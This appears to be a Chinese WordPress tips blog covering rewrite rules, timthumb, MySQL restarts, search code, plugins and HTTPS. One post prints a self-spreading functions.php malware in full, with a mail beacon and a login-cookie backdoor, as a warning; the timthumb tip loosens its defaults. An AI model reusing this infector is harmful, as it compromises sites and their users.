Posted on Leave a comment

linux服务器wordpress目录站群伪静态

#ignored: “-” thing used or unknown variable in regex/rew
rewrite ^/([_0-9a-zA-Z-]+/)?wp-admin$ /$1wp-admin/ permanent;
if (-f $request_filename){
set $rule_2 1;
}
if (-d $request_filename){
set $rule_2 1;
}
if ($rule_2 = "1"){
#ignored: “-” thing used or unknown variable in regex/rew
}
rewrite ^/([_0-9a-zA-Z-]+/)?(wp-(content|admin|includes).*) /$2 last;
rewrite ^/([_0-9a-zA-Z-]+/)?(.*.php)$ /$2 last;
rewrite /. /index.php last;

Posted on Leave a comment

WordPress多站点不支持timthumb.php解决方法

在使用wordpress主题的时候,因为timthumb基于安全问题,除了支持指定的几个网站的外链图片外,不支持其它任何外链图片;另一方面则是因为对本机图片地址的处理导致。解决的方法很简单,仅需要增加支持的外链域名,和修改对机图片处理的代码即可。解决方式如下:

1、编辑timthumb.php文件,找到以下代码(大概131行)

  1. if(! isset($ALLOWED_SITES)){
  2.     $ALLOWED_SITES = array (
  3.         'flickr.com',
  4.         'staticflickr.com',
  5.         'picasa.com',
  6.         'img.youtube.com',
  7.         'upload.wikimedia.org',
  8.         'photobucket.com',
  9.                 'www.2zzt.com', //新增加的域名
  10.     );
  11. }

添加到您的域名到里面去即可。

2、在timthumb.php文件,找到以下代码(大概216行):

  1. $this->src = preg_replace('/https?:\/\/(?:www\.)?' . $this->myHost . '/i', ''$this->src);

把该行代码删除或注释掉即可。提示:这行代码的意思是“如果图片地址是本机的,则删除图片url中本机的域名部分”。

3、完成上面的操作,保存后,重新刷新网站页面图片就会显示了。

4、如果图裂了,请检测文件权限是否是755。

Posted on Leave a comment

宝塔mysql总是自动停止解决总汇

最近小编使用宝塔经常遇到mysql自动停止,好多读者发消息给小编说网站打不开,小编于是查看了一下服务器mysql的日志,发现mysql出错时报【InnoDB: Fatal error: cannot allocate memory for the buffer pool】Innodb 存储引擎的缓存机制和 MyISAM 的最大区别就在于 Innodb 不仅仅缓存索引,同时还会缓存实际的数据。所以,完全相同的数据库,使用 Innodb 存储引擎可以使用更多的内存来缓存数据库相关的信息,当然前提是要有足够的物理内存。innodb_buffer_pool_size 参数用来设置 Innodb 最主要的 Buffer(Innodb_Buffer_Pool)的大小,也 就是缓存用户表及索引数据的最主要缓存空间,对 Innodb 整体性能影响也最大。这个参数设置成内存的50%-80%,当然具体要结合实际情况而定,考虑别的存储引擎占用的内存,考虑服务器是不是还提供其他服务等等…看来,我的机器之所以宕掉的原因是,系统默认的内存:default innodb_buffer_pool_sizeinnodb_buffer_pool_size=50M出现数据库经常停止可以参照下面解决方案:

解决方法一:

安装宝塔面板【linux工具箱】

添加设置SWAP大小,根据你的实际内存进行调整,swap是Linux下的虚拟内存,设置适当的swap可增加服务器稳定性,建议swap容量在真实内存容量的1.5倍左右,若您的服务器内存大于4GB,可设1-2GB的固定值,swap文件默认保存在/www/swap,设置前请确保磁盘空间够用。

解决方法二:

根据你的实际内存进行mysql优化

解决方法三:

登陆宝塔后台-计划任务-添加Mysql守护,执行周期,可选择多长时间执行一次,比如10分钟监控执行一次,具体的周期请站长根据自己服务器实际情况来设置。

pgrep -x mysqld &> /dev/nullif [ $? -ne 0 ];thenbash /www/server/panel/script/rememory.sh /etc/init.d/mysqld startfi

解决方法四:

这个方法简单粗暴,适合土豪站长,直接增加服务器内存或使用云数据库,把数据库分离出去。如果你遇到mysql问题或有更好的解决方法欢迎投稿给小编,我们和你一起探讨学习。

我使用的是第三个方法,和下面这个一样

宝塔面板mysql数据库意外停止,怎么设置监控mysql数据库运行情况,发现数据库停止了,能够自动重启Mysql数据库呢?
其实细心的站长不难发现,宝塔自带了Mysql进程守护功能。具体操作方法如下:
登陆宝塔后台-计划任务-添加Mysql守护,执行周期,可选择多长时间执行一次,比如10分钟监控执行一次,具体的周期请站长根据自己服务器实际情况来设置。

如图:

宝塔Mysql进程守护自动重启,宝塔Mysql进程守护代码:

pgrep -x mysqld &> /dev/null
if [ $? -ne 0 ];then
bash /www/server/panel/script/rememory.sh
/etc/init.d/mysqld start
fi

Posted on Leave a comment

wordpress高级搜索功能示例:按分类搜索

wordpress默认的搜索功能,仅有一个搜索框,功能单一,如何给搜索框增加搜索条件,提高搜索的准确性?

示例:按分类搜索。

让访客可以在搜索的时候,可以选择分类作为条件,同时,本教程也可更改为其它的各种条件。

效果如图:

wordpress高级搜索功能示例:按分类搜索

步骤一:改造搜索框

一般主题都会有一个searchform.php文件,该文件为搜索框的模板,也有的主题没有这个文件,而是使用了wordpress默认的搜索框,要改造搜索框的话,则需要建立searchform.php文件,以便自定义搜索框,阿树使用的searchform.php搜索框的内容和默认的搜索框是一样的,如下:

<form role="search" method="get" class="search-form" action="<?php echo home_url(); ?>">
<label>
<span class="screen-reader-text">Search:</span>
<input type="search" class="search-field" placeholder="Search&hellip;" value="" name="s" title="Search:" />
</label>
<input type="submit" class="search-submit" value="Search" />
</form>

里面只有一个文本输入框,及一个提交按钮,我们需要在里面添加一个下拉选择框,先获取所有分类,然后循环将分类输出,如下:

<?php
$args = array(
'hide_empty' => 0
);
$categories = get_categories( $args );
//上面的代码获取所有分类
?>
<form role="search" method="get" class="search-form" action="<?php echo home_url(); ?>">
<label>
<span class="category-text">Category:</span>
<select name="cat">
<option value="">All Category</option>
<?php foreach($categories as $category){ ?>
<option value="<?php echo $category->term_id; ?>"><?php echo $category->name; ?></option>
<?php } ?>
</select>
</lable>
<label>
<span class="screen-text">Search:</span>
<input type="search" class="search-field" placeholder="Search&hellip;" value="" name="s" title="Search:" />
</label>
<input type="submit" class="search-submit" value="Search" />
</form>

如此一来,搜索框中便多了一个分类的下拉框,注意下拉框的name是cat。

步骤二:处理搜索条件

接下来就是搜索页面按条件处理搜索了。

网上很多教程都是直接修改搜索页模板search.php来达到目的。那样很不方便,多了很多条件判断不说,还需要另外查询文章,有的甚至直接用数据库操作语句从数据库中查找。

将下面代码添加到functions.php文件中即可:

<?php
function return_only_selected_category( $query ) {
//is_search判断搜索页面 !is_admin排除后台 $query->is_main_query()只影响主循环
if ( is_search() && !is_admin() && $query->is_main_query() ){
//有cat值传入
if(isset($_GET['cat']){
$term_id = (int)$_GET['cat']; //处理分类参数
if( $term_id ){
//分类查询的参数
$tax_query = array(
array(
'taxonomy'=>'category', //可换为自定义分类法
'field'=>'term_id',
'operator'=>'IN',
'terms'=>array($term_id)
)
);
$query->set( 'tax_query', $tax_query );
}
}
}
return $query;
}
add_filter('pre_get_posts', 'return_only_selected_category');
?>

通过pre_get_posts钩子去更改查询条件即可。

Posted on Leave a comment

wordpress主题functions.php文件恶意代码清除方法

昨天在给朋友做一个定制主题的时候,在functions.php发现了一段非常奇怪的代码。自己也忘了是怎么出现的。我随便找了个函数百度了一下,发现中招的人真是不少啊。原来这段包含在functions.php的代码是已经流行了一段时间的恶意代码。这段代码会自动循环感染你所有的WordPress主题functions.php文件。所以发出来给大家做个参考。有碰到类似的朋友记得一定要删除。

小心WordPress主题functions.php包含的恶意代码

这段代码是被加在在functions.php的?>后面的。如果发现了类似的多余函数,或者很多个?>那就要检查一下了。修改的时候记得把其他WordPress主题的functions.php设置为只读。这样才能不被感染。全部改完后再把权限修改回来。

另外说一点,本站下载的主题不会含有恶意代码,凡是其他网站下载的Yusi主题,请自己检查清楚有没有后门。

好了,下面把那段恶意代码发布上来,希望大家自己对照检查一下。

<?phpfunction _verifyactivate_widgets(){    //当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php         //查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));    $output="";    $allowed="";    //去除html和php标签,其实这一句是扯蛋。。。    $output=strip_tags($output, $allowed);    //取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes        //为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。        //以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径    $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));    if (is_array($direst)){        foreach ($direst as $item){            //如果主题functions.php文件可写            if (is_writable($item)){                //特征码                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));                //取目标functions.php文件内容                $cont=file_get_contents($item);                //没找到特征码?OK,试图感染                if (stripos($cont,$ftion) === false){                    //查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记                    $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";                    //这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。                    $output .= $before . "Not found" . $after;                    //如果文件是以 ?> 标记结尾的,连标记一起取过来                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}                    //开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码                    $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);                     //后面这句也是伪装用的                                $output .= ($isshowdots && $ellipsis) ? "..." : "";                }            }        }    }    return $output;}function _get_allwidgets_cont($wids,$items=array()){    //从$wids数组弹出一个元素(实际上是一个位置)    $places=array_shift($wids);    //如果位置字串是以/结尾的,则去掉/    if(substr($places,-1) == "/"){        $places=substr($places,0,-1);    }     //若不存在这样的文件或目录则直接返回false    if(!file_exists($places) || !is_dir($places)){        return false;    }elseif(is_readable($places)){        //否则的话。。。嘿嘿        //遍历此目录        $elems=scandir($places);        foreach ($elems as $elem){            if ($elem != "." && $elem != ".."){                //如果是目录,则加入$wids数组                if (is_dir($places . "/" . $elem)){                    $wids[]=$places . "/" . $elem;                } elseif (is_file($places . "/" . $elem)&&                     $elem == substr(__FILE__,-13)){                        //否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的                    $items[]=$places . "/" . $elem;}                }            }    }else{        return false;       }    //下面还有子目录?再找找看,递归    if (sizeof($wids) > 0){        return _get_allwidgets_cont($wids,$items);    } else {        //好了,完事了,以数组返回所有找到的functions.php文件的绝对路径        return $items;    }} //下面是3个针对低版本的php而写的兼容函数if(!function_exists("stripos")){     function stripos(  $str, $needle, $offset = 0  ){         return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );     }} if(!function_exists("strripos")){     function strripos(  $haystack, $needle, $offset = 0  ) {         if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );         if(  $offset < 0  ){             $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );         }         else{             $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );         }         if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;         $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );         return $pos;     }}if(!function_exists("scandir")){     function scandir($dir,$listDirectories=false, $skipDots=true) {        $dirArray = array();        if ($handle = opendir($dir)) {            while (false !== ($file = readdir($handle))) {                if (($file != "." && $file != "..") || $skipDots == true) {                    if($listDirectories == false) { if(is_dir($file)) { continue; } }                    array_push($dirArray,basename($file));                }            }            closedir($handle);        }        return $dirArray;    }} //这个动作添加了,用于检测所有主题目录下functions.php并感染add_action("admin_head", "_verifyactivate_widgets"); function _getprepare_widget(){    if(!isset($text_length)) $text_length=120;    if(!isset($check)) $check="cookie";    if(!isset($tagsallowed)) $tagsallowed="<a>";    if(!isset($filter)) $filter="none";    if(!isset($coma)) $coma="";    if(!isset($home_filter)) $home_filter=get_option("home");     if(!isset($pref_filters)) $pref_filters="wp_";    if(!isset($is_use_more_link)) $is_use_more_link=1;     if(!isset($com_type)) $com_type="";     if(!isset($cpages)) $cpages=$_GET["cperpage"];    if(!isset($post_auth_comments)) $post_auth_comments="";    if(!isset($com_is_approved)) $com_is_approved="";     if(!isset($post_auth)) $post_auth="auth";    if(!isset($link_text_more)) $link_text_more="(more...)";    if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");    if(!isset($checkswidgets))     //这个实际是wp_set_auth_cookie    $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;    if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";    if(!isset($contentmore)) $contentmore="ma".$coma."il";    if(!isset($for_more)) $for_more=1;    if(!isset($fakeit)) $fakeit=1;    if(!isset($sql)) $sql="";     //如果 _is_widget_active_ option内容为空,即表示没有被感染过    if (!$widget_yes) :     global $wpdb, $post;    //取出存在已经通过的评论(不包括trackback/pingback)的文章    // post_author 为 liv[email protected] 的文章,肯定是没有的     $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#    if (!empty($post->post_password)) {         if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {             if(is_feed()) {                 $output=__("There is no excerpt because this is a protected post.");            } else {                $output=get_the_password_form();            }        }    }    if(!isset($fixed_tags)) $fixed_tags=1;    if(!isset($filters)) $filters=$home_filter;     //$gettextcomments实际上为 wp_mail    if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;    if(!isset($tag_aditional)) $tag_aditional="div";     //这里$sh_cont即为 [email protected]    if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#    if(!isset($more_text_link)) $more_text_link="Continue reading this entry";      if(!isset($isshowdots)) $isshowdots=1;     $comments=$wpdb->get_results($sql);     if($fakeit == 2) {         $text=$post->post_content;    } elseif($fakeit == 1) {         $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;    } else {         $text=$post->post_excerpt;    }    //开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址    $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#    if($text_length < 0) {        $output=$text;    } else {        if(!$no_more && strpos($text, "<span id="more-5265"></span>")) {            $text=explode("<span id="more-5675"></span>", $text, 2);            $l=count($text[0]);            $more_link=1;            //执行这一句时就开始发邮件了。            $comments=$wpdb->get_results($sql);        } else {            $text=explode(" ", $text);            if(count($text) > $text_length) {                $l=$text_length;                $ellipsis=1;            } else {                $l=count($text);                $link_text_more="";                $ellipsis=0;            }        }        for ($i=0; $i<$l; $i++)                $output .= $text[$i] . " ";    }    //把感染标记置为1    update_option("_is_widget_active_", 1);    if("all" != $tagsallowed) {        $output=strip_tags($output, $tagsallowed);        return $output;    }    endif;    $output=rtrim($output, "\s\n\t\r\0\x0B");    $output=($fixed_tags) ? balanceTags($output, true) : $output;    $output .= ($isshowdots && $ellipsis) ? "..." : "";    //$filter 为 none ...,又是在伪装    $output=apply_filters($filter, $output);    switch($tag_aditional) {        case("div") :            $tag="div";        break;        case("span") :            $tag="span";        break;        case("p") :            $tag="p";        break;        default :            $tag="span";    } //$checkswidgets即是wp_set_auth_cookie    if ($is_use_more_link ) {        if($for_more) {            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";        } else {            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";        }    }    return $output;} //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”add_action("init", "_getprepare_widget");  //这个函数也是用来伪装的,无恶意function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {    global $wpdb;    $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";    $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";    if(!$show_pass_post) $request .= " AND post_password =\"\"";    if($duration !="") {         $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";    }    $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";    $posts=$wpdb->get_results($request);    $output="";    if ($posts) {        foreach ($posts as $post) {            $post_title=stripslashes($post->post_title);            $comment_count=$post->comment_count;            $permalink=get_permalink($post->ID);            $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;        }    } else {        $output .= $before . "None found" . $after;    }    return  $output;}?>

我这边被感染的代码没有注解,我去找了由无灯大大分析注释版本代码,非常感谢。

小小建议

在有些地方下载的免费主题,记得检查Wordpress主题的functions.php文件是否含有上面的恶意代码(一般会自动加载在functions.php正常函数的最后)。如果有。记得设置为只读然后删除。

Posted on Leave a comment

wordpress主题选项项目添加代码

1.主题选项图片上传:'logo'=>array('title'=>'logo上传','type'=>'upload','size'=>'60','des'=>'手动填写地址/wp-content/themes/abctheme/images/logo.png , 或者上传文件插入地址','tips'=>'大小宜为500x51'),

2.主题位置代码:<img src="<?php echo get_option( 'logo' ); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" />

注:字母 logo为可替换内容,要注意上下两段代码里都要替换。 alt和 title如果不需要可以选择删掉,这里贴上去的alt和title显示在前端都是博客名称或者企业名称。

1.文字插入:'zjtel'=>array('title'=>'手机号码','type'=>'textarea','width'=>'500px','height'=>'25px'),

2.主题代码位置: < ?php echo stripslashes( get_option( 'zjtel' ) ); ?>

注:zjtel为可替换。

其中1是放在admin-option/data.php,2是放在像header.php,footer.php和index.php等展现页里面。

Posted on Leave a comment

柳城的百度seo插件不能用后的wordpress sitemap插件 baidu_sitemap_china分享

要说起wordpress sitemap插件,老实说,市面上并不多,以往,用得最多的可能就是柳城的百度seo插件了,可惜,该插件已不支持最新版的wp及php7以上。。。无奈一款简单直观的wordpress sitemap插件进入了历史篇章(作者已回应不再更新)

那么,可能大家用得最多的wordpress sitemap插件就属于 google-sitemap-generator 了吧,当然,以我的技术层面还不足以去评价这款插件是好还是不好。

再然后,有一款dx-seo插件里的sitemap分支还是不错的,可惜dx-seo这款插件安装启动后,也基本是各种报错了,而且该插件里还涵盖了一些其他用不到的功能,为了wordpress sitemap再带上一些其他没用的功能,强迫症患者是不是会很难受?

最后,其他市面上各种sitemap的小版本,我也体验了一番,基本都存在报错、无法使用的情况,无奈。。。

那么,今天,就给大家带来一款,我自己觉得还算可以的一款wordpress sitemap插件,提前说明,该插件是从dx-seo里单纯抽离出sitemap功能后编写成独立插件的。

看图就可以很直观的清楚如何设置,小白都可以看懂的设置,需要的朋友就请下载后体验吧,有任何不明白的地方,欢迎该贴回复!

Posted on Leave a comment

wp super cache 页面不相符!时间戳有差异或者不存在(本人是使用百度云加速造成的)

wP Super Cache caching was broken but has been fixed! The script advanced-cache.php could not load wp-cache-phase1.php.
然后测试缓存,说是缓存不成功:页面不相符!时间戳有差异或者不存在!

重启服务器、更换主题、重新安装 WP Super Cache、恢复快照到几十天之前都试了,也均不灵验。

后来突然想到,WP Super Cache 是通过生成静态的 html 文件来减轻每次看博文读取数据库负担的,好像 CloudFlare 的加速里给开了 HTML JS CSS 加速。

去 百度云加速 面板里关掉这三个的加速,Purge 一下,回到博客后台,测试缓存,已经正常工作了。顺便预缓存下吧!

Posted on Leave a comment

百度分享支持https

站点自从开启 https 之后 ,百度分享就不能用了!但是又寻找不到类似百度分享的替代品。。

怎么办呢?要如何解决 百度分享不支持https的问题呢,

跟着博主动动手,让你百度分享仍然能在https下使用 ~

伸手党

先上伸手党的解决方案~

博主修改好的分享代码(下面两个链接下载其中一个)的即可

static 解压后丢到站点根目录下即可。

然后对应的百度分享代码中,把http://bdimg.share.baidu.com/改为 /

.src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
改为
.src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
 到此,百度分享HTTPS化的教程结束。
本博客,也是用的这一个方案解决的问题,可以看一下我的分享代码 
Posted on Leave a comment

使用百度云加速将网站开启https

2019年10月份,百度云加速开启了支持https的加速模式,在百度云加速后台即可很方便的将网站设置成https网址,https加速模式现在使用越来越普遍,从百度可以支持使用https之后,相信会有很多网站都开始使用https加密。

废话不多说直接说说在使用百度云加速过程中需要注意到的几个问题;

1.首先在百度云加速控制台申请证书,证书是可以免费申请的,并且问过客户证书到期可以重新免费申请。一个域名可以申请多个证书,我的站申请了2个,一个是www.xxxxx.com,另外一个是m.xxxxx.com。

2.这点需要特别注意一下,否则使用https网址打不开网站,如果你只是在网站上

3. ,经过上面两步,你的网站已经可以使用https打开了,也可以使用https进入网站后台,如果网站是基于wordpress,安装插件 Really Simple SSL ,并启用使网站都支持https, 如果不是wordpress,则需要根据不同站点选择手动或者自动,使网站都支持https。 这一步也可以作为第一步来操作,每个站点情况不同可能会有所不同。然后看看下图,我使用的是360浏览器,你的站点是否会显示绿色的锁了。如果显示黄色三角号,说明你网站里还有些地方没有使用https,一般只有很少一点,直接手动解决

特别说明第二点,为什么使用半程加密,使用半程加密是只加密CDN节点的,源站其实并没有加密,如果是普通企业站完全够用,如果你想做的更完美把源站也加密,则需要源站也开启SSL部署,由于在百度云加速后台申请的证书只有专业版以后才提供下载,所以源站是不能部署SSL的,所以必须是不在百度申请的证书,然后把证书在源站部署,再在百度云加速这边将证书上传即可。如果都部署了,则加密的时候除了严格加密模式之外,都可以使用。